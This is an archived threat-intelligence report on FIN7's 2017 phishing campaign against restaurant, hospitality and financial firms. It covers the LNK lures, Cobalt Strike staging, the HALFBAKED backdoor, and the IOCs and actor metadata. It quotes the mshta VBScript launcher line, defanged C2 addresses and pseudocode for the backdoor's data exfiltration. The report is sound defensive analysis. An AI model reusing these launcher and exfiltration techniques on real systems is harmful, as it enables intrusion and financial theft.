{ "id": "03d16aed-8e48-49ce-b697-104b459c4ba6", "created_at": "2026-04-06T00:09:04.312715Z", "updated_at": "2026-04-10T03:35:53.035043Z", "deleted_at": null, "sha1_hash": "072218900503798227d428dfbb797f8c1fd5e395", "title": "FIN7 Evolution and the Phishing LNK | Mandiant", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 750247, "plain_text": "FIN7 Evolution and the Phishing LNK | Mandiant\r\nBy Mandiant\r\nPublished: 2017-04-24 · Archived: 2026-04-02 10:43:12 UTC\r\nWritten by: Nick Carr, Saravanan Mohankumar, Yogesh Londhe, Barry Vengerik, Dominik Weber\r\nFIN7 is a financially-motivated threat group that has been associated with malicious operations dating back to late\r\n2015. FIN7 is referred to by many vendors as “Carbanak Group”, although we do not equate all usage of the\r\nCARBANAK backdoor with FIN7. FireEye recently observed a FIN7 spear phishing campaign targeting\r\npersonnel involved with United States Securities and Exchange Commission (SEC) filings at various\r\norganizations.\r\nIn a newly-identified campaign, FIN7 modified their phishing techniques to implement unique infection and\r\npersistence mechanisms. FIN7 has moved away from weaponized Microsoft Office macros in order to evade\r\ndetection. This round of FIN7 phishing lures implements hidden shortcut files (LNK files) to initiate the infection\r\nand VBScript functionality launched by mshta.exe to infect the victim.\r\nIn this ongoing campaign, FIN7 is targeting organizations with spear phishing emails containing either a malicious\r\nDOCX or RTF file – two versions of the same LNK file and VBScript technique. These lures originate from\r\nexternal email addresses that the attacker rarely re-used, and they were sent to various locations of large restaurant\r\nchains, hospitality, and financial service organizations. The subjects and attachments were themed as complaints,\r\ncatering orders, or resumes. As with previous campaigns, and as highlighted in our annual M-Trends 2017 report,\r\nFIN7 is calling stores at targeted organizations to ensure they received the email and attempting to walk them\r\nthrough the infection process.\r\nInfection Chain\r\nWhile FIN7 has embedded VBE as OLE objects for over a year, they continue to update their script launching\r\nmechanisms. In the current lures, both the malicious DOCX and RTF attempt to convince the user to double-click\r\non the image in the document, as seen in Figure 1. This spawns the hidden embedded malicious LNK file in the\r\ndocument. Overall, this is a more effective phishing tactic since the malicious content is embedded in the\r\ndocument content rather than packaged in the OLE object.\r\nBy requiring this unique interaction – double-clicking on the image and clicking the “Open” button in the security\r\nwarning popup – the phishing lure attempts to evade dynamic detection as many sandboxes are not configured to\r\nsimulate that specific user action.\r\nhttps://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html\r\nPage 1 of 6\n\nFigure 1: Malicious FIN7 lure asking victim to double click to unlock contents\r\nThe malicious LNK launches “mshta.exe” with the following arguments passed to it:\r\nvbscript:Execute(\"On Error Resume Next:set w=GetObject(,\"\"Word.Application\"\"):execute\r\nw.ActiveDocument.Shapes(2).TextFrame.TextRange.Text:close\")\r\nThe script in the argument combines all the textbox contents in the document and executes them, as seen in Figure\r\n2.\r\nhttps://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html\r\nPage 2 of 6\n\nFigure 2: Textbox inside DOC\r\nThe combined script from Word textbox drops the following components:\r\n\\Users\\[user_name]\\Intel\\58d2a83f7778d5.36783181.vbs\r\n\\Users\\[user_name]\\Intel\\58d2a83f777942.26535794.ps1\r\n\\Users\\[user_name]\\Intel\\58d2a83f777908.23270411.vbs\r\nAlso, the script creates a named schedule task for persistence to launch “58d2a83f7778d5.36783181.vbs” every 25\r\nminutes.\r\nVBScript #1\r\nThe dropped script “58d2a83f7778d5.36783181.vbs” acts as a launcher. This VBScript checks if the\r\n“58d2a83f777942.26535794.ps1” PowerShell script is running using WMI queries and, if not, launches it.\r\nPowerShell Script\r\n“58d2a83f777942.26535794.ps1” is a multilayer obfuscated PowerShell script, which launches shellcode for a\r\nCobalt Strike stager.\r\nThe shellcode retrieves an additional payload by connecting to the following C2 server using DNS:\r\naaa.stage.14919005.www1.proslr3[.]com\r\nOnce a successful reply is received from the command and control (C2) server, the PowerShell script executes the\r\nembedded Cobalt Strike shellcode. If unable to contact the C2 server initially, the shellcode is configured to\r\nreattempt communication with the C2 server address in the following pattern:\r\n[a-z][a-z][a-z].stage.14919005.www1.proslr3[.]com\r\nVBScript #2\r\nhttps://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html\r\nPage 3 of 6\n\n“mshta.exe” further executes the second VBScript “58d2a83f777908.23270411.vbs”, which creates a folder by\r\nGUID name inside “Intel” and drops the VBScript payloads and configuration files:\r\n\\Intel\\{BFF4219E-C7D1-2880-AE58-9C9CD9701C90}\\58d2a83f777638.60220156.ini\r\n\\Intel\\{BFF4219E-C7D1-2880-AE58-9C9CD9701C90}\\58d2a83f777688.78384945.ps1\r\n\\Intel\\{BFF4219E-C7D1-2880-AE58-9C9CD9701C90}\\58d2a83f7776b5.64953395.txt\r\n\\Intel\\{BFF4219E-C7D1-2880-AE58-9C9CD9701C90}\\58d2a83f7776e0.72726761.vbs\r\n\\Intel\\{BFF4219E-C7D1-2880-AE58-9C9CD9701C90}\\58d2a83f777716.48248237.vbs\r\n\\Intel\\{BFF4219E-C7D1-2880-AE58-9C9CD9701C90}\\58d2a83f777788.86541308.vbs\r\n\\Intel\\{BFF4219E-C7D1-2880-AE58-9C9CD9701C90}\\Foxconn.lnk\r\nThis script then executes “58d2a83f777716.48248237.vbs”, which is a variant of FIN7’s HALFBAKED backdoor.\r\nHALFBAKED Backdoor Variant\r\nThe HALFBAKED malware family consists of multiple components designed to establish and maintain a\r\nfoothold in victim networks, with the ultimate goal of gaining access to sensitive financial information. This\r\nversion of HALFBAKED connects to the following C2 server:\r\nhxxp://198[.]100.119.6:80/cd\r\nhxxp://198[.]100.119.6:443/cd\r\nhxxp://198[.]100.119.6:8080/cd\r\nThis version of HALFBAKED listens for the following commands from the C2 server:\r\ninfo: Sends victim machine information (OS, Processor, BIOS and running processes) using WMI queries\r\nprocessList: Send list of process running\r\nscreenshot: Takes screen shot of victim machine (using 58d2a83f777688.78384945.ps1)\r\nrunvbs: Executes a VB script\r\nrunexe: Executes EXE file\r\nrunps1: Executes PowerShell script\r\ndelete: Delete the specified file\r\nupdate: Update the specified file\r\nAll communication between the backdoor and attacker C2 are encoded using the following technique, represented\r\nin pseudo code:\r\nFunction send_data(data)\r\nrandom_string = custom_function_to_generate_random_string()\r\nencoded_data = URLEncode(SimpleEncrypt(data))\r\npost_data(\"POST”, random_string \u0026 \"=\" \u0026 encoded_data, Hard_coded_c2_url,\r\nCreate_Random_Url(class_id))\r\nThe FireEye iSIGHT Intelligence MySIGHT Portal contains additional information based on our investigations of\r\na variety of topics discussed in this post, including FIN7 and the HALFBAKED backdoor.\r\nhttps://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html\r\nPage 4 of 6\n\nPersistence Mechanism\r\nFigure 3 shows that for persistence, the document creates two scheduled tasks and creates one auto-start registry\r\nentry pointing to the LNK file.\r\nFigure 3: FIN7 phishing lure persistence mechanisms\r\nExamining Attacker Shortcut Files\r\nIn many cases, attacker-created LNK files can reveal valuable information about the attacker’s development\r\nenvironment. These files can be parsed with lnk-parser to extract all contents. LNK files have been valuable\r\nduring Mandiant incident response investigations as they include volume serial number, NetBIOS name, and\r\nMAC address.\r\nFor example, one of these FIN7 LNK files contained the following properties:\r\nVersion: 0\r\nNetBIOS name: andy-pc\r\nDroid volume identifier: e2c10c40-6f7d-4442-bcec-470c96730bca\r\nDroid file identifier: a6eea972-0e2f-11e7-8b2d-0800273d5268\r\nBirth droid volume identifier: e2c10c40-6f7d-4442-bcec-470c96730bca\r\nBirth droid file identifier: a6eea972-0e2f-11e7-8b2d-0800273d5268\r\nMAC address: 08:00:27:3d:52:68\r\nUUID timestamp: 03/21/2017 (12:12:28.500) [UTC]\r\nUUID sequence number: 2861\r\nFrom this LNK file, we can see not only what the shortcut launched within the string data, but that the attacker\r\nlikely generated this file on a VirtualBox system with hostname “andy-pc” on March 21, 2017.\r\nExample Phishing Lures\r\nFilename: Doc33.docx\r\nhttps://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html\r\nPage 5 of 6\n\nMD5: 6a5a42ed234910121dbb7d1994ab5a5e\r\nFilename: Mail.rtf\r\nMD5: 1a9e113b2f3caa7a141a94c8bc187ea7\r\nFIN7 April 2017 Community Protection Event\r\nOn April 12, in response to FIN7 actively targeting multiple clients, FireEye kicked off a Community Protection\r\nEvent (CPE) – a coordinated effort by FireEye as a Service (FaaS), Mandiant, FireEye iSight Intelligence, and our\r\nproduct team – to secure all clients affected by this campaign.\r\nPosted in\r\nThreat Intelligence\r\nSecurity \u0026 Identity\r\nSource: https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html\r\nhttps://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html\r\nPage 6 of 6", "extraction_quality": 1, "language": "EN", "sources": [ "ETDA", "MITRE", "MISPGALAXY", "Malpedia" ], "references": [ "https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html" ], "report_names": [ "fin7-phishing-lnk.html" ], "threat_actors": [ { "id": "c9617bb6-45c8-495e-9759-2177e61a8e91", "created_at": "2022-10-25T15:50:23.405039Z", "updated_at": "2026-04-10T02:00:05.387643Z", "deleted_at": null, "main_name": "Carbanak", "aliases": [ "Carbanak", "Anunak" ], "source_name": "MITRE:Carbanak", "tools": [ "Carbanak", "Mimikatz", "PsExec", "netsh" ], "source_id": "MITRE", "reports": null }, { "id": "9de1979b-40fc-44dc-855d-193edda4f3b8", "created_at": "2025-08-07T02:03:24.92723Z", "updated_at": "2026-04-10T02:00:03.755516Z", "deleted_at": null, "main_name": "GOLD LOCUST", "aliases": [ "Anunak", "Carbanak", "Carbon Spider ", "FIN7 ", "Silicon " ], "source_name": "Secureworks:GOLD LOCUST", "tools": [ "Carbanak" ], "source_id": "Secureworks", "reports": null }, { "id": "bb8702c5-52ac-4359-8409-998a7cc3eeaf", "created_at": "2023-01-06T13:46:38.405479Z", "updated_at": "2026-04-10T02:00:02.961112Z", "deleted_at": null, "main_name": "FIN7", "aliases": [ "ATK32", "G0046", "G0008", "Sangria Tempest", "ELBRUS", "GOLD NIAGARA", "Coreid", "Carbanak", "Carbon Spider", "JokerStash", "CARBON SPIDER" ], "source_name": "MISPGALAXY:FIN7", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "ed3810b7-141a-4ed0-8a01-6a972b80458d", "created_at": "2022-10-25T16:07:23.443259Z", "updated_at": "2026-04-10T02:00:04.602946Z", "deleted_at": null, "main_name": "Carbanak", "aliases": [ "Anunak", "Carbanak", "Carbon Spider", "ELBRUS", "G0008", "Gold Waterfall", "Sangria Tempest" ], "source_name": "ETDA:Carbanak", "tools": [ "AVE_MARIA", "Agentemis", "AmmyyRAT", "Antak", "Anunak", "Ave Maria", "AveMariaRAT", "BABYMETAL", "BIRDDOG", "Backdoor Batel", "Batel", "Bateleur", "BlackMatter", "Boostwrite", "Cain \u0026 Abel", "Carbanak", "Cl0p", "Cobalt Strike", "CobaltStrike", "DNSMessenger", "DNSRat", "DNSbot", "DRIFTPIN", "DarkSide", "FOXGRABBER", "FlawedAmmyy", "HALFBAKED", "JS Flash", "KLRD", "MBR Eraser", "Mimikatz", "Nadrac", "Odinaff", "POWERPIPE", "POWERSOURCE", "PsExec", "SQLRAT", "Sekur", "Sekur RAT", "SocksBot", "SoftPerfect Network Scanner", "Spy.Agent.ORM", "TEXTMATE", "TeamViewer", "TiniMet", "TinyMet", "Toshliph", "VB Flash", "WARPRISM", "avemaria", "cobeacon" ], "source_id": "ETDA", "reports": null }, { "id": "f4f16213-7a22-4527-aecb-b964c64c2c46", "created_at": "2024-06-19T02:03:08.090932Z", "updated_at": "2026-04-10T02:00:03.6289Z", "deleted_at": null, "main_name": "GOLD NIAGARA", "aliases": [ "Calcium ", "Carbanak", "Carbon Spider ", "FIN7 ", "Navigator ", "Sangria Tempest ", "TelePort Crew " ], "source_name": "Secureworks:GOLD NIAGARA", "tools": [ "Bateleur", "Carbanak", "Cobalt Strike", "DICELOADER", "DRIFTPIN", "GGLDR", "GRIFFON", "JSSLoader", "Meterpreter", "OFFTRACK", "PILLOWMINT", "POWERTRASH", "SUPERSOFT", "TAKEOUT", "TinyMet" ], "source_id": "Secureworks", "reports": null }, { "id": "bfded1cf-be73-44f9-a391-0751c9996f9a", "created_at": "2022-10-25T15:50:23.337107Z", "updated_at": "2026-04-10T02:00:05.252413Z", "deleted_at": null, "main_name": "FIN7", "aliases": [ "FIN7", "GOLD NIAGARA", "ITG14", "Carbon Spider", "ELBRUS", "Sangria Tempest" ], "source_name": "MITRE:FIN7", "tools": [ "Mimikatz", "AdFind", "JSS Loader", "HALFBAKED", "REvil", "PowerSploit", "CrackMapExec", "Carbanak", "Pillowmint", "Cobalt Strike", "POWERSOURCE", "RDFSNIFFER", "SQLRat", "Lizar", "TEXTMATE", "BOOSTWRITE" ], "source_id": "MITRE", "reports": null }, { "id": "d85adfe3-e1c3-40b0-b8bb-d1bacadc4d82", "created_at": "2022-10-25T16:07:23.619566Z", "updated_at": "2026-04-10T02:00:04.690061Z", "deleted_at": null, "main_name": "FIN7", "aliases": [ "APT-C-11", "ATK 32", "G0046", "Gold Niagara", "GrayAlpha", "ITG14", "TAG-CR1" ], "source_name": "ETDA:FIN7", "tools": [ "7Logger", "Agentemis", "Anubis Backdoor", "Anunak", "Astra", "BIOLOAD", "BIRDWATCH", "Bateleur", "Boostwrite", "CROWVIEW", "Carbanak", "Cobalt Strike", "CobaltStrike", "DICELOADER", "DNSMessenger", "FOWLGAZE", "HALFBAKED", "JSSLoader", "KillACK", "LOADOUT", "Lizar", "Meterpreter", "Mimikatz", "NetSupport", "NetSupport Manager", "NetSupport Manager RAT", "NetSupport RAT", "NetSupportManager RAT", "POWERPLANT", "POWERSOURCE", "RDFSNIFFER", "Ragnar Loader", "SQLRAT", "Sardonic", "Sekur", "Sekur RAT", "TEXTMATE", "Tirion", "VB Flash", "cobeacon" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434144, "ts_updated_at": 1775792153, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/072218900503798227d428dfbb797f8c1fd5e395.pdf", "text": "https://archive.orkl.eu/072218900503798227d428dfbb797f8c1fd5e395.txt", "img": "https://archive.orkl.eu/072218900503798227d428dfbb797f8c1fd5e395.jpg" } }